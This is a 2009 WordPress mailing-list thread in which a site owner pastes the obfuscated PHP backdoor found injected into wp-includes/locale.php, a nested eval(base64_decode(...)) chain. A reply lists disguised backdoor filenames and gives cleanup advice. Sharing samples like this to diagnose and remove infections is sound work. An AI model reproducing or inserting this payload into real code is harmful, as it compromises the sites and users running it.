[wp-hackers] WP exploit , was Re: [Webmaster Central Help] Site hacked.
Malaiac
malaiac at gmail.com
Wed Dec 2 14:32:01 UTC 2009
Ok. The base64 statement was in ./wp-includes/locale.php, at the end
of the file. The file seems a legit one to me, so I guess the lien was
added by the exploit... ?
I removed the lines, and I'm going to check it stays like that.
FYI, the lines were :
<?php
$V210305394="VlE+KSk0KQQpPis0KS8yNTxza3JgVlFWUX85NC8ENzIoL3tmezopKToic3ljdW11b2N5d3ltaXVqbGl1amJieXd5bWl1aWx1bmJ5d3ltaHVqbWh1amtpeXd5bW91am5sdWpobHl3eW1vdWpubHVqaGN5d3ltb3VpaGh1amxoeXd5bW91bWN1Y2t5d3ltb3VtY3Vjanl3eW1vdW1jdWNpeXd5bW91bWN1Y2h5d3ltb3VtY3Vjb3l3eW1vdW1jdWNueXd5bW91bWN1Y215d3ltb3VtY3VjbHl3eW1vdW1jdWNjeXd5bW91bWN1Y2J5d3ltb3VtY3Via3l3eW1vdW1jdWJqeXd5bW91bWN1Yml5d3ltb3VsbnVobXl3eW1tdWptaHVqbGt5d3ltbXVqbWh1amxveXd5bW11amJtdWpranl3eW1tdWpibXVtbnl3eW1tdWpibXVtbHl3eW1tdWpibXVsaXl3eW1tdWpibXVsaHl3eW1tdWpibXVsb3l3eW1tdWpibXVsbHl3eW1tdWpibXVsY3l3eW1tdWpibXVja3l3eW1tdWpibXVjanl3eW1tdWpibXVia3l3eW1tdWpibXVianl3eW1tdWpibXViaXl3eW1tdWpibXViaHl3eW1tdWpibXVibHl3eW1tdWpibXViYnl3eW1tdWlqY3Vtbnl3eW1tdWlqY3Vsa3l3eW1tdWlpY3VqbW95d3ltbXVpaWN1am1ueXd5bW11aWljdWptbXl3eW1tdWlpY3VqbGh5d3ltbXVpaWN1amNpeXd5bW11aW9idW1veXd5bW11aW9idW1ueXd5bW11aW9idW1teXd5bW11aW9idW1seXd5bW11aW9idW1jeXd5bW11aW9idW1ieXd5bW11aW9idWxreXd5bW11aW9idWxqeXd5bW11aW9idWxpeXd5bW11aW9idWxoeXd5bW11aW9idWxjeXd5bW11aW9idWxieXd5bW11Ym91aWhreXd5bW11Ym91aWhpeXd5bW11Ym91aWhoeXd5bW11Ym91aWhjeXd5bWx1amJudWpqbnl3eW1sdWpibnVob3l3eW1sdWpibnVobHl3eW1sdWpibnVvb3l3eW1sdWpibnVvbnl3eW1sdWpibnVua3l3eW1sdWpibnVuanl3eW1sdWpibnVuaXl3eW1sdWpibnVuaHl3eW1sdWpibnVub3l3eW1sdWpibnVuY3l3eW1sdWpibnViY3l3eW1jdWpvaXVqYm55d3ltY3Vqb2l1aWtoeXd5bWN1am9pdWlqanl3eW1jdWpvaXVpaml5d3ltY3Vqb2l1aWhreXd5bWN1am9pdWloanl3eW1jdWpvaXVpb2t5d3ltY3Vqb2l1aW9teXd5bWN1am9pdWlvYnl3eW1jdWpvaXVpbmt5d3ltY3Vqb2l1aW5qeXd5bWN1amNrdWlqbXl3eW1jdWpja3Vpbmt5d3ltY3VqY2t1aW5qeXd5bWJ1am9sdWxieXd5bGl1am91amJieXd5bGl1aGt1amtqeXd5bGl1aGt1amtpeXd5bGl1aGt1amtoeXd5bGl1aGt1amtveXd5bGl1aGt1amtseXd5bGl1aGt1ampreXd5bGl1aGt1ampqeXd5bGl1aGt1amlveXd5bGl1aGt1amljeXd5bGl1aGt1amlieXd5bGl1aGt1amhqeXd5bGl1aGt1amhpeXd5bGl1aGt1amhoeXd5bGl1aGt1amhveXd5bGl1aGt1amhueXd5bGl1aGt1am9peXd5bGl1aGt1am1qeXd5bGl1aGt1amxseXd5bGl1aGt1amxieXd5bGl1aGt1aWpoeXd5bGl1aGt1aWpveXd5bGl1aGt1aWpueXd5bGl1aGt1aWpteXd5bGl1aGt1aWlqeXd5bGl1aGt1aWlteXd5bGl1aGt1aW5peXd5bGl1aGt1bm95d3lsaXVoa3VubXl3eWxpdWhrdW1reXd5bGl1aGt1bWp5d3lsaXVoa3Vtbnl3eWxpdWhrdWxjeXd5bGl1aGt1bGJ5d3lsaXVoa3Vjanl3eWxpdWhrdWNseXd5bGl1aGt1Ynl3eWxpdWhrdWJseXd5bGl1aGt1YmN5d3lsaXVoa3ViYnl3eWxvdW11amp5d3lsb3VtdWppeXd5bG91bXVqaHl3eWxvdW11amhqeXd5bG91bXVqbXl3eWxvdW11amx5d3lsb3VtdWpjeXd5bG91bXVqYnl3eWxvdW11aWt5d3lsb3VtdWlqeXd5bG91bXVpaXl3eWxvdW11aWh5d3lsb3VtdWlveXd5bG91bXVpb2t5d3lsb3VtdWlueXd5bG91bXVpbXl3eWxvdW11aWx5d3lsb3VtdWljeXd5bG91bXVpYnl3eWxvdW11aGt5d3lsb3VtdWhqeXd5bG91bXVtbnl3eWxvdW11bW15d3lsb3VtdW1seXd5bG91bXVtY3l3eWxvdW11bWJ5d3lsb3VtdWx5d3lsb3VtdWxreXd5bG91bXVsanl3eWxvdW11bGl5d3lsb3VtdWxoeXd5bG91bXVsb3l3eWxvdW11bG55d3lsb3VtdWxteXd5bG91bXVsYnl3eWxvdW11Y3l3eWxvdW11Y255d3lsb3VtdWNteXd5bG91bXVjbHl3eWxvdW11Ynl3eWxvdW5udWlseXd5am9qdWpjbnVpa2J5d3lqbWJ1aWtsdWloY3l3eWpiYnVqbGx1amN5d3lpa2l1am1rdWpsY3l3eWlraXVqbWt1amxieXd5aWtpdWpta3VqY2t5d3lpa2l1am1rdWpjanl3eWlraXVqbWt1amNoeXd5aWtpdWpta3VqY255d3lpa2l1am1udWJteXd5aWtpdWptbnViY3l3eWlraXVqbW51YmJ5d3lpa2l1aWppdW55d3lpa2l1b211amJ5d3lpa2h1amlodWpjY3l3eWlraHVqb2p1bml5d3lpa2h1aW5udWlob3l3eWlrbXVqYmt1b2h5d3lpa2x1amltdWloYnl3eWlrYnVqdWppeXd5aWtidWp1amh5d3lpa2J1anVoaXl3eWlrYnVqdWhjeXd5aWtidWpoanVva3l3eWlrYnVqaGp1b2p5d3lpa2J1amhqdW9jeXd5aWtidWpoanVvYnl3eWlrYnVqaGp1bmt5d3lpa2J1amhqdW5qeXd5aWtidWpoanVta3l3eWlrYnVqaGp1bWl5d3lpa2J1amNudWprY3l3eWlrYnVqY251amlpeXd5aWtidWpjbnVqb2p5d3lpa2J1amNudWpvaHl3eWlrYnVqY251aW5oeXd5aWtidWpianVqaWh5d3lpa2J1amJqdW1veXd5aWtidWpianVtbnl3eWlrYnVqYmp1Y2l5d3lpa2J1amJqdWNoeXd5aWtidW1sdWlrbXl3eWlrYnVsaHVqbG15d3lpa2J1Y251aWhjeXd5aWpqdWpvdWN5d3lpamp1am1idWlvanl3eWlqaHVpam11am9oeXd5aWptdWprYnVqaWp5d3lpam11amtidWppbXl3eWlqbXVqaG11aWhoeXd5aWptdWpvbnVuY3l3eWlqbXVqbm51amJjeXd5aWptdWpubnVpa2t5d3lp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";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNlRrUmpNVTlVVVRKTmVrMDVXVzFHZWxwVVdUQllNbEpzV1RJNWExcFRaMmxYVnpGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVWGhOZWxVeVRtcEpNazlVTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMHhTalZaYTJSWFpGTkpjRTk1VWxkT2VrazBUbnBKZVU1cVNYZFFWMHBvWXpKVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVp6Uk9WRmwzVFdwQmQwOVVNV2xaV0U1c1RtcFNabHBIVm1waU1sSnNTME5LYVUwd2NISkphV3MzU2taWk5VMUVTVE5PYWxFMVRXcEJPVmx0Um5wYVZGa3dXREpTYkZreU9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNVRWUkJlazFFVlhwUFZGRTVTa1paZWs1RVl6RlBWRkV5VFhwTmIwcEdXWGxOVkVGNlRVUlZlazlVVVhCUGVWSlhUbFJOTUU1NlozaE5SR2QzVUZOU1YwNUVSWHBPVkZreVRXcFpOVXREVWxkTmFrVjNUWHBCTVUxNmF6QkxWSE05SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKRll4TmpRNE16SXlNakU5SnljN1ptOXlLQ1JXTmpnNE9USTBPVGs1UFRBN0pGWTJPRGc1TWpRNU9UazhKRlkxTXpRM09ERXdPREE3SkZZMk9EZzVNalE1T1Rrckt5bDdKRll4TmpRNE16SXlNakV1UFNSV056STROekl5TmpJd0tDZ2tWamc0TlRZd01qQXdPU2drVmpJeE1ETXdOVE01TkZza1ZqWTRPRGt5TkRrNU9WMHBYakl4TkRBeE5Ea3pNemtwS1R0OVpYWmhiQ2drVmpFMk5EZ3pNakl5TVNrNyIpKTs="));
?>
2009/12/2 Mike Little <wordpress at zed1.com>:
> 2009/12/2 Malaiac <malaiac at gmail.com>
>
>> 2009/11/27 Malaiac <malaiac at gmail.com>:
>> > Regarding
>> http://www.google.com/support/forum/p/Webmasters/thread?fid=2bb823d5af6173a00004794fff8f89b7&hl=en
>> >
>> > it seems this is an exploit from older versions of WP.
>> >
>> > One of my sites had been hacked with it. Upgrading to 2.8.6 and
>> > overwriting the wp-settings.php file did the job.
>>
>> Oops.
>> upgrading to 2.8.6 only fixed the problem for a few days before the
>> hacker went on it again.
>>
>>
>>
> Look for files which are not part of WordPress and remove them. They often
> have wp sounding names but contain complete cracker control panels that can
> edit files, create new files, and modify your database all under automated
> remote control! Once those are there, upgrading wp doesn't make them go
> away.
>
> Filenames I have seen on clients' sites include:
> class-cache.php
> cache.php
> wp-manager.php
> works.php
> wp-info.php
> wp-stats.php
> wp-old.php
>
>
> The very best thing to do is download your complete wp directory to your
> desktop, and compare it to a pristine copy of wp 2.8.6. Look for unknown
> files and especially different file sizes.
>
>
> Mike
> --
> Mike Little
> http://zed1.com/
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
More information about the wp-hackers
mailing list